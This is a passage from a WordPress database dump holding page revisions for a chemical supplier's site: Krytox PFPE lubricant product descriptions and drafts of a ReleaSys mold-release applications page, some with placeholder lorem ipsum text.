PFPE lubricants for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, military applications. These are just a few of many different applications.\n<h2><span style="font-size: 75%;">Krytox Today</span></h2>\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\n\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\n\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\n<h3><span style="font-size: 85%;">Krytox Grades by Product:</span></h3>\nTypical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application. These products can be regenerated back to original properties and reused. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).  This is used in high vacuum industries and for sealing joints in laboratory applications It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.\n\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.GPL 29X. The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a>Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form.<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a>Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a>The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed.<strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a>This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics.<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a>This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics.<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a>This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener.XP 2C5The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear.XHT EP 298 and EP 299These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection.\n\nGPL 577A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor<a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a>A special high vacuum grease for applications where outgassing must be avoided.\n\nThis grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.\n\nGPL 2EXThe GPL 2E(X) lubricants are formulated using new anti-rust additives.<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a>Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.\n<table width="1455">\n<tbody>\n<tr>\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\n</tr>\n<tr>\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\n</tr>\n<tr>\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\n</tr>\n<tr>\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\n</tr>\n<tr>\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil.</td>\n</tr>\n<tr>\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\n</tr>\n</tbody>\n</table>\n<strong>\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\n\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\n\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', '', '', 'draft', 'closed', 'closed', '', '', '', '', '2017-06-01 14:12:43', '2017-06-01 14:12:43', '', 0, 'https://www.miller-stephenson.com/?page_id=4384', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (4385, 3, '2017-06-01 14:20:23', '2017-06-01 14:20:23', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.  Products for this application  need to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer.  <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900 & 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes  an ever-widening variety of thermoplastic resins.  In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4340" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants polyurethane can be molded (High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands of a release agent very high.  Miller-Stephenson’s <b>ReleaSys™</b> release systems has specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenacious to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass provide critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and all other elastomers,  Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years.  Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers the ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4287" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4179"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast Mold Release Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 14:20:23', '2017-06-01 14:20:23', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4386, 0, '2017-06-01 14:23:52', '2017-06-01 14:23:52', '', '', '', 'publish', 'closed', 'closed', '', '4386', '', '', '2017-06-01 14:23:52', '2017-06-01 14:23:52', '', 0, 'https://www.miller-stephenson.com/nf_sub/4386/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4387, 3, '2017-06-01 14:31:26', '2017-06-01 14:31:26', '', 'shutterstock_318854045', '', 'inherit', 'closed', 'closed', '', 'shutterstock_318854045', '', '', '2017-06-01 14:31:26', '2017-06-01 14:31:26', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/06/shutterstock_318854045.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4388, 3, '2017-06-01 14:32:27', '2017-06-01 14:32:27', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer.<b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900 & 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizesan ever-widening variety of thermoplastic resins.In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants polyurethane can be molded (High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands of a release agent very high.Miller-Stephenson’s <b>ReleaSys™</b> release systems has specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenacious to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass provide critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 9800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and all other elastomers,Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years.Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers the ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4287" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4179"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast Mold Release Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 14:32:27', '2017-06-01 14:32:27', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4389, 3, '2017-06-01 14:53:40', '2017-06-01 14:53:40', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer.<b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900 & 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizesan ever-widening variety of thermoplastic resins.In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants polyurethane can be molded (High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands of a release agent very high.Miller-Stephenson’s <b>ReleaSys™</b> release systems has specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenacious to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass provide critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 9800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and all other elastomers,Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years.Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers the ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding, however regardless of the resin several critical criteria exist for all mold releases used in injection molding: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.  Our ReleaSys product line binds-to and protects even the most complex, highly polished molds. optimizes resin flow and generates higher part quality and lower scrap rates..</p>\n[button text="ReleaSys™ 9800 & 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4287" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4179"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast Mold Release Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 14:53:40', '2017-06-01 14:53:40', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4390, 2, '2017-06-01 15:47:06', '2017-06-01 15:47:06', '<h2 style="text-align: center;">Krytox History &amp; Product Overview</h2>\r\n<h3><strong>For the full Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">product list, click here.</a></strong></h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, GE used Krytox oil for an engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n<h2><span style="font-size: 75%;">Krytox Today</span></h2>\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<h3><span style="font-size: 85%;">Krytox Grades by Product:</span></h3>\r\n<table 